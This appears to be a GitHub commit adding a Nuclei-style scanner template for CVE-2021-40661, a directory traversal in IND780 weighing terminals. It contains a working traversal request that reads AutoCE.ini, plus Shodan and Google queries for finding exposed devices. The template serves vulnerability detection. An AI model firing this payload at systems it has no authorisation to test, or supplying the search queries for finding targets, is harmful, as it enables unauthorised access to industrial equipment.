Create CVE-2021-40661.yaml

patch-1
For3stCo1d 2022-11-02 23:05:10 +08:00 committed by GitHub
parent 470eba0ef6
commit 6f3b81da16
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: CVE-2021-40661
info:
name: IND780 - Directory Traversal
author: For3stCo1d
severity: high
description: |
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
reference:
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
classification:
cve-id: CVE-2021-40661
metadata:
shodan-query: "IND780"
google-query: inurl:excalweb.dll
tags: cve,cve2021,ind780,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ExePath=\Windows'
- 'WorkDir=\Windows'
condition: and
- type: status
status:
- 200